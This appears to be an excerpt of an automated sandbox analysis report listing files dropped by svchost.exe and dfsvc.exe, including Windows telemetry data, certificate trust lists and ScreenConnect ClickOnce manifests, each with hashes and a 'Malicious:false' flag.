                                                                                                                                                                                                                                                        SHA-256:BCEA3CCA7838A5EDD81392CB0A6DA795BE59CBC0BDCAA8D85F5C08E43648836F
                                                                                                                                                                                                                                                        SHA-512:4D293DB2A3D6186CEE0A094178BB01CC03C5B4ED7C6E98A9D17E335524196C70C05C875A5625F1903466837AAACA0A535DA12CEA1B29F258725652BD620CCFA9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="559229" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):78048
                                                                                                                                                                                                                                                        Entropy (8bit):3.101197537247237
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:zja3VxHhcT5H4yWFjBCaHuvayZvLrhbBamt6n/w0Em/Q:zja3VxHhcT5H4yWFjBCaHuvayZvLVbBv
                                                                                                                                                                                                                                                        MD5:3F175F6B67B5841D90575F5A6A66263C
                                                                                                                                                                                                                                                        SHA1:23DBE81B1D2478D8FC528E3ECB562626DD58C422
                                                                                                                                                                                                                                                        SHA-256:9703D3474A59F8935A1E434BF821AA7AAD5BBC2C120F4BD7533AA052238B6F9E
                                                                                                                                                                                                                                                        SHA-512:E5F1E63B051C346EAE45804378DCD3EFA1A6F5B7308389C50FA60F97F4730F4C501770558F8E1FF6189C145DD54C1516F7FDE86A5BB28CB707BAB6E9733F9BD9
                                                                                                                                                                                                                                                        Malicious:false
Preview:ImageName,UniqueProcessId,NumberOfThreads,WorkingSetPrivateSize,HardFaultCount,NumberOfThreadsHighWatermark,CycleTime,CreateTime,UserTime,KernelTime,BasePriority,PeakVirtualSize,VirtualSize,PageFaultCount,WorkingSetSize,PeakWorkingSetSize,QuotaPeakPagedPoolUsage,QuotaPagedPoolUsage,QuotaPeakNonPagedPoolUsage,QuotaNonPagedPoolUsage,PagefileUsage,PeakPagefileUsage,PrivatePageCount,ReadOperationCount,WriteOperationCount,OtherOperationCount,ReadTransferCount,WriteTransferCount,OtherTransferCount,Han
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                                        Entropy (8bit):2.6852008289137195
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:TiZYWGz3H3rYyYGdW+bHTYEZG3taiI0EjS4wa9Z4buafTeM2uocIo33:2ZDGflZ7A6LafTeM2uobo33
                                                                                                                                                                                                                                                        MD5:E4CAC2C0A15B8A01A1D15ECD42F5069A
                                                                                                                                                                                                                                                        SHA1:8699ECDCD254F8F7FF5AB9F1EB172C3AD9CD03FA
                                                                                                                                                                                                                                                        SHA-256:6DB2F0CFA368912321E2A956361595245BE38843D11C051567B6E48640A92B62
                                                                                                                                                                                                                                                        SHA-512:D4C439A960791CE4F771836BF2D02C997F69EB114AC642803977A36D13130B2E01B8958783452091350D25D23A117DEB6E3BCB75402661F321A8E73E6D8AD765
                                                                                                                                                                                                                                                        Malicious:false
Preview:B.TimerResolution 156250..B.PageSize 4096..B.NumberOfPhysicalPages 1048333..B.LowestPhysicalPageNumber 2..B.HighestPhysicalPageNumber 1310719..B.AllocationGranularity 65536..B.MinimumUserModeAddress 65536..B.MaximumUserModeAddress 140737488289791..B.ActiveProcessorsAffinityMask
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):4770
                                                                                                                                                                                                                                                        Entropy (8bit):7.946747821604857
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                                                                                        MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                                                                                        SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                                                                                        SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                                                                                                        SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):71954
                                                                                                                                                                                                                                                        Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1716
                                                                                                                                                                                                                                                        Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                        MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                        SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                        SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                        SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):727
                                                                                                                                                                                                                                                        Entropy (8bit):7.563840806637443
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:5onfZPc5RlRtBfQRKsS3GO1OfBJWPggSMcJD0Khky41hrQOSFxvF0nBwUU2wZ:5iFcdZ6KP3YHHMcJyyO9QOSunaT2wZ
                                                                                                                                                                                                                                                        MD5:23D2A40D03B92FF977A4F7F3F5B7B3D6
                                                                                                                                                                                                                                                        SHA1:DFAF45BE65A508FED92543473C235FB9E56EC900
                                                                                                                                                                                                                                                        SHA-256:42931FA0CF548D85BAB78A132B91B75AF2E8C94891568C976BE1C9B48D3ECAB1
                                                                                                                                                                                                                                                        SHA-512:2383D3513513D6D929FD1B7D780D152B3D8240EC013DEF216C6BAB6127B3C4BC523770A1BD388A84100C0672E68B6C46E62DDAAD78BB641E084C6F43690C1966
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:Certificate, Version=3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1428
                                                                                                                                                                                                                                                        Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                        MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                        SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                        SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                        SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                        Size (bytes):338
                                                                                                                                                                                                                                                        Entropy (8bit):3.446520245343517
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kKj9+M/K8uSJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:hLClkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                        MD5:5DB5D897D05B420C6BEF3279A4C28EB0
                                                                                                                                                                                                                                                        SHA1:16A5DB9377BAA363FF42549B23665A53A9026087
                                                                                                                                                                                                                                                        SHA-256:2B44BB3B3E147E265E33A51743B923E9882313D899C3CC479771BD504C7CF385
                                                                                                                                                                                                                                                        SHA-512:F210229BA1D258E0A6B780DF6212C686A11140FF387E34999901FB067E14A4C7ED7D24F6A61CA0AA95B13B19700A9A6E0606B92243DF7597D8D2E0591D8D0ADA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:p...... .........$...(..(...............................................8V.@.'.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                        Entropy (8bit):3.150184159866505
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kKG8eL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:jeiDnLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                                        MD5:2CD37540B21380A0E1C479FFD5D6D83D
                                                                                                                                                                                                                                                        SHA1:F94198614FA3A3E1EDCAE9F3FD4C7246FE8BDF3A
                                                                                                                                                                                                                                                        SHA-256:D830540EB243DA536BE2F968ED5EBAEFA20209208FFF6176C00D5660CD80340C
                                                                                                                                                                                                                                                        SHA-512:3E3221821329103C0F9003F548964B346B898DC90B06B1179890ED51959AAF36D9D9379A95B6EB4FC431EFEEA9A561EBA69F3DE0514138FA8C5635C40DA37C22
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:p...... ............Y'..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):308
                                                                                                                                                                                                                                                        Entropy (8bit):3.213144440746552
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kKZwefzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:6eqtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                                        MD5:6BD225F8678D3A55FCB94E43E5B35F41
                                                                                                                                                                                                                                                        SHA1:FED2515CD44A4D67F0AC3A8015804C8F5A5C6B08
                                                                                                                                                                                                                                                        SHA-256:5FDEB4E98E6B58271504F4B58121DDF9635E5BF952A641EAF70E26781E98D3FB
                                                                                                                                                                                                                                                        SHA-512:B8A6645E1E06925538D27CE56C6DD83FADF002D2CE2979748ABF5792B56871B0A93748F4C865AF3B5C6D13F080616407B385CC3FC8947646725DB72BB110997A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:p...... .........#..o'..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):412
                                                                                                                                                                                                                                                        Entropy (8bit):3.9918442063391626
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kKzMbetlIls0fOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:LMRmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                                        MD5:AF6F767CDEC867AF4A30FA8F8D5ED484
                                                                                                                                                                                                                                                        SHA1:9BDEEB2FE5ACC77E83CDE63F6725532DB7C0B6CC
                                                                                                                                                                                                                                                        SHA-256:552097852881A80631AC6299275A80CB231CF7A133E769AA32BC6D86231B764A
                                                                                                                                                                                                                                                        SHA-512:1EC204C1256B131976872B850FB6D3B669A5A4B06B141A464006F8FD406795F43A42B7D89ECFF5EA1F545F76EF99FFA618AB824F7178CD2335713F4DFE3C9517
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:p...... ....(.......d'..(................].G{%....}p.*....................}p.*.. ........\...&.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):254
                                                                                                                                                                                                                                                        Entropy (8bit):3.060772882719261
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kK7shLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:TshLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                                        MD5:26EC0DAF65B002D8C27C9E896326BD84
                                                                                                                                                                                                                                                        SHA1:D5F886529DB0D713786ADA0851CACD2783805A70
                                                                                                                                                                                                                                                        SHA-256:035A93A731C27500974A4568B2833BABC3C6D78028CB580F243846B97814DE4A
                                                                                                                                                                                                                                                        SHA-512:49A117D4D4833D8D11477D58D2799A1359D805BEDF86A03371E4B61DA6E9F16B50A5D108A0B8B70AA3A6A3E751A5B7309D2EE85228EDC409973DAF8734DFFC96
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:p...... ....l...!0F.H'..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):25496
                                                                                                                                                                                                                                                        Entropy (8bit):5.634499234636374
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:2rqD/Gch63X91yYFX9R/QPIBM7YT6a3nPdWhe:2W5h63X9PX9R/QPI+0TWhe
                                                                                                                                                                                                                                                        MD5:E74E4D74D52D693A9A7F451682355E5B
                                                                                                                                                                                                                                                        SHA1:F2D2C52DA61D841342339BDACC06024C0A65F99E
                                                                                                                                                                                                                                                        SHA-256:0ECB1951081FD2AECCA9DD979EB1DE131E32D0D084030CA1B5D1C4A3FE9906E7
                                                                                                                                                                                                                                                        SHA-512:23CE8B7AAB3F796AF5C7551C746AEC9DD44CCF9F578FBB3D0DFD7709F46B0D0F3F64B0567D7E46011DBB86D4A8F0D0BB0921A32CD0CA47BA924C6A8B9152327C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):17858
                                                                                                                                                                                                                                                        Entropy (8bit):5.954498332217529
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:heoXUrotw1aMWf6PX9hhyYF6X9FX9R/QPIYM7Y7:hV6PX9J6X9FX9R/QPIN07
                                                                                                                                                                                                                                                        MD5:9896F09BBC139E973FBA917FDA83C893
                                                                                                                                                                                                                                                        SHA1:56D9E63E078DAE56125B3B1F2E6A71A5F310E5DC
                                                                                                                                                                                                                                                        SHA-256:7831765826E44631D78ED36FA9D04F65B30E3A67FEFFB41E393FD73A063C7F61
                                                                                                                                                                                                                                                        SHA-512:024BAE2420FBA1790D946432336462F1A9F43388345393D9838EC913D109D198103182A853596B512A6C5E0F81096A1F76EA8A60908A456C320C32B8C5FA22CD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.3.8936" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3452
                                                                                                                                                                                                                                                        Entropy (8bit):4.283134017477995
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:d6IEAeF7lMDWWuLgJOe6S+9owQX7gq7mLT4qQBmJIew1oohIYX:ksWW+eV+WwQXzmLT4vBDewRhIYX
                                                                                                                                                                                                                                                        MD5:F8B321C4C91D834DA9F02213EA1380E2
                                                                                                                                                                                                                                                        SHA1:C6F85E834BE90EF99C337991CE2F70F8A11387FC
                                                                                                                                                                                                                                                        SHA-256:065AB32CD537F120B20E687C8724683126AC223428B70822D434A8A8DBB11122
                                                                                                                                                                                                                                                        SHA-512:AB0D3D8EC8C4B388D6BA5203D2E185099F1FD0F81E5A155B86C420C84489DCAF7FD457C645203E6F10CA4F8292F56595B6D42D0B890230BD060BA23EA0F85E03
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1215
                                                                                                                                                                                                                                                        Entropy (8bit):5.132426421892876
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onR+geP0AqvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AmGVETDTo
                                                                                                                                                                                                                                                        MD5:7836CB4BB4AA3204BE8BCB1998653762
                                                                                                                                                                                                                                                        SHA1:555EBD513BB5C4EE073415FD71F24D0697038F6D
                                                                                                                                                                                                                                                        SHA-256:F1E8F85E0495160BBA92E1B89C8C5A1BE51E5F7CC289212CBBAF6FC6141B4076
                                                                                                                                                                                                                                                        SHA-512:B18CC8779DCF15AB7DA2604F4D48E53870FE84E22B1CEE34AF9CC9D9B5B7A0CC5AABF11CC08CADD137A8CAA86451326A770B5FAC727E84E9721206649E4AE7A7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):5256
                                                                                                                                                                                                                                                        Entropy (8bit):4.0250811707239675
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:+w4+RzgZxeV+Ww7kk7bFME8uIm+ctYwnANbz:LRzgIJu7GeIaAp
                                                                                                                                                                                                                                                        MD5:341BD08CB7F6EDCDD4FE1F8993E1A5C9
                                                                                                                                                                                                                                                        SHA1:A9AD8697806F31B61D07DB50FD5098EFE32F816F
                                                                                                                                                                                                                                                        SHA-256:8AACCF0BEACA243DB4CEDB7DB00FBD3260DC65ED831BCBC20E3DD38A1F2A73A7
                                                                                                                                                                                                                                                        SHA-512:AF63E3F5EF5F41DE3F82768FD1AC5AE657308949430D798C7FC90CB7C0980791D77BE91593227CFAE4BE0AFF7C0EB5137208451C1E34C051CC02F758CD56BE68
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1980
                                                                                                                                                                                                                                                        Entropy (8bit):5.059741759134869
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRbggeP0AIvSkcyMwcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AEHMwGQAXRTFgTo
                                                                                                                                                                                                                                                        MD5:22FE4BC3BB143D14D2142E096955F9B7
                                                                                                                                                                                                                                                        SHA1:332597F5A4D2D3724DCFDA19AF7734846CEDF474
                                                                                                                                                                                                                                                        SHA-256:39D81BE76E978E5D6BF4DC5F74226E48FA4EA77780A6792CAB947C5D20D4A6AA
                                                                                                                                                                                                                                                        SHA-512:508660E83C75AD55A11CDDC6381547536A4CBB5A4A940D3D17F77AD256C9943360650750343FE32C86F6DC462273AEAE68E40903F2C33A0AD9F09D393FB1B59F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):6584
                                                                                                                                                                                                                                                        Entropy (8bit):3.947321881564364
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:Oh0PPBpRWeV+Www+8WpSqlzIoM3vyltUQJIlvObDTVqO/t7:lPPLJypSkcyJ2ObVR
                                                                                                                                                                                                                                                        MD5:083450DF6F2B70621EBF0ECE2C79AA86
                                                                                                                                                                                                                                                        SHA1:ABB7BF482552AD1B9B62D33EE40754293CB0A9A4
                                                                                                                                                                                                                                                        SHA-256:0D8183E4A8800310C1940CFE23A76090524F2A661600B645302E220A7E63FD99
                                                                                                                                                                                                                                                        SHA-512:420E034E9A6AA97E569A80D72444DF4F527FA13196A27A646E9F428E59B30C2DA3C503EF5E551274FE07EB602021BCB5344E0AB6AC632B047060D1F59CAF8E6E
                                                                                                                                                                                                                                                        Malicious:false
